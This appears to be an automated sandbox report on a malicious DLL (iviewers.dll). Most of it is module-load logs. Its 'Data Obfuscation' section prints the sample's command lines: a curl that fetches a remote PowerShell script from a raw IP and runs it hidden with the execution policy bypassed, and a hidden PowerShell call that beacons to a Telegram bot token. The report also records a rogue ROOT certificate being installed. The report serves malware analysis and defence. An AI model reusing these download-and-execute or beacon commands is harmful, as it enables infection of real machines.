            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: iviewers.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: iviewers.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.pdb source: powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.pdb source: powershell.exe, 00000025.00000002.1915834227.0000000005718000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.pdb source: powershell.exe, 0000001B.00000002.1861999388.00000000056D5000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.pdb source: powershell.exe, 00000018.00000002.1835577839.0000000004D85000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Suspicious command line found
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Suspicious powershell command line found
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F95F533 push ecx; ret 0_2_6F95F546
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6F95F533 push ecx; ret 3_2_6F95F546
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F95F533 push ecx; ret 4_2_6F95F546
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04D1E948 pushfd ; ret 12_2_04D1E949
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 43_2_0143D1F2 push ecx; retf 43_2_0143D218
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00ECC3B3 push eax; retf 44_2_00ECC405
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C360 pushad ; ret 44_2_00F2C361
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB60 pushad ; retf 44_2_00F2CB61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C364 pushad ; ret 44_2_00F2C365
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB64 pushad ; retf 44_2_00F2CB65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C368 push 6800F2C3h; ret 44_2_00F2C36D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB68 push 6800F2CBh; retf 44_2_00F2CB6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C350 push eax; ret 44_2_00F2C351
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB50 push eax; retf 44_2_00F2CB51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2C354 push eax; ret 44_2_00F2C355
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 44_2_00F2CB54 push eax; retf 44_2_00F2CB55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00437069 push es; retf 45_2_00437074
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0043C990 push eax; mov dword ptr [esp], 5C5D5E5Fh45_2_0043C99E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0041B324 push F3B90044h; retf 45_2_0041B32A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_00445C05 push ds; iretd 45_2_00445C08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 45_2_0044856B push cs; retf 45_2_0044856C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 49_2_00D9B01A push ecx; retf 49_2_00D9B040

            Persistence and Installation Behavior

            barindex
            Installs new ROOT certificates
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
